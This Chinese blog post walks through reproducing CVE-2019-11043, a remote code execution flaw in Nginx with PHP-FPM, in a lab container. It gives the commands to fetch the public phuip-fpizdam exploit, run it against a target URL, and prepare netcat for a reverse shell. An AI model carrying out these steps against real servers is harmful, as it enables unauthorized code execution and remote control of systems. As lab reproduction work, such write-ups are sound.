CVE-2019-11043复现

 

 

  • 01

 

CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。

 

漏洞环境:  

先把exp克隆到本地。

 

git clone https://github.com/neex/phuip-fpizdam.git

 

CVE-2019-11043复现_第1张图片

安装go环境

wget -c https://storage.googleapis.com/golang/go1.13.3.linux-amd64.tar.gz

 

把文件解压到/usr/local 目录

tar -C /usr/local/ -xzf go1.13.3.linux-amd64.tar.gz

编辑/etc/profile,在文件的最后加上

export PATH=$PATH:/usr/local/go/bin

保存退出后执行 source /etc/profile

然后进行编译,在编译的过程中会出现下面的报错,原因是go mod国内被墙了。

所以我们要为go环境变量设置proxy

go env -w GOPROXY=https://goproxy.io,directgo env -w GOPRIVATE=*.corp.example.comgo env -w GO111MODULE=on

CVE-2019-11043复现_第2张图片

 

  • 02

 

 

以上准备好之后就可以利用漏洞了。

 

漏洞利用:  

该靶场在Ip:8080。

CVE-2019-11043复现_第3张图片

用exp执行下面命令

phuip-fpizdam.exe http://x.x.x.x:8080/index.php

CVE-2019-11043复现_第4张图片

然后就可以执行命令了

CVE-2019-11043复现_第5张图片

反弹shell:  

给此docer容器装一个 nc

apt-get updateapt-get install -y netcat

然后攻击机开启监听,执行命令等待shell反弹

CVE-2019-11043复现_第6张图片

CVE-2019-11043复现_第7张图片

 

参考连接:

http://blog.leanote.com/post/snowming/9da184ef24bd

CVE-2019-11043复现_第8张图片

 

你可能感兴趣的:(执行代码)